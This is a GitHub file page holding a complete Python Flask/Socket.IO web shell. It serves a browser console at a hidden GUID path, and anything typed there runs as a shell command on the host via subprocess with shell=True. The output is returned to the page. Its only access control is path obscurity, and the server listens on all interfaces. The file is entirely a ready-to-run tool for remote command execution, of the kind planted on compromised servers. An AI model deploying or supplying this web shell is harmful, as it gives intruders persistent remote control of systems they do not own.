scripts/webshell.py at master · timkent/scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/usr/bin/env python3

"""
python3 based web shell
based on gist here: https://gist.github.com/phoemur/461c97aa5af5c785062b7b4db8ca79cd
modified by @__timk to:
* make output a bit nicer and safer
* work regardless of scheme
* append a GUID to the end of the path to provide security through obscurity :)
"""

import os
import subprocess
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit

SHELL_PATH_GUID='124c7c56-d6c6-4c2f-bd9a-c220dde30d0d'

HTML = '''
<html>
    <head>
        <script type="text/javascript" src="//code.jquery.com/jquery-3.2.1.min.js"></script>
        <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/socket.io/1.3.6/socket.io.min.js"></script>
        <script type="text/javascript" charset="utf-8">
            var socket;
            $(document).ready(function(){
                socket = io.connect('//' + document.domain + ':' + location.port + location.pathname + '/shell');
                socket.on('connect', function() {
                    socket.emit('joined', {});
                });
                socket.on('message', function(data) {
                    var p = document.createElement('p');
                    var pre = document.createElement('pre');
                    pre.innerText = data.msg;
                    p.appendChild(pre);
                    document.getElementById('shell').appendChild(p);
                });
                socket.on('status', function(data) {
                    var p = document.createElement('p');
                    var pre = document.createElement('pre');
                    pre.innerText = data.msg;
                    p.appendChild(pre);
                    document.getElementById('shell').appendChild(p);
                });
                $('#text').keypress(function(e) {
                    var code = e.keyCode || e.which;
                    if (code == 13) {
                        text = $('#text').val();
                        $('#text').val('');
                        socket.emit('comando', {msg: text});
                    }
                });
            });
            function leave_room() {
                socket.disconnect();
                window.location.href = "about:blank";
            }
        </script>
    </head>
    <body>
        <div id="shell"></div><br><br>
        <input id="text" size="80" placeholder="Commands go here"><br><br>
        <a href="#" onclick="leave_room();">Exit</a>
    </body>
</html>
'''

app = Flask(__name__)
socketio = SocketIO(app)

@app.route('/' + SHELL_PATH_GUID)
def index():
    return HTML

@socketio.on('joined', namespace='/' + SHELL_PATH_GUID + '/shell')
def joined(message):
    emit('status', {'msg': '[*] Sucessfully connected to host'})

@socketio.on('comando', namespace='/' + SHELL_PATH_GUID + '/shell')
def comando(comando):
    c = comando['msg']
    emit('message', {'msg': '$ ' + c})
    print(c)
    try:
        b = subprocess.check_output(c, shell=True).decode()
    except Exception as err:
        b = str(err)

    emit('message', {'msg': b})

if __name__ == '__main__':
    PORT = int(os.getenv('PORT', '5000'))
    socketio.run(app, host='0.0.0.0', port=PORT)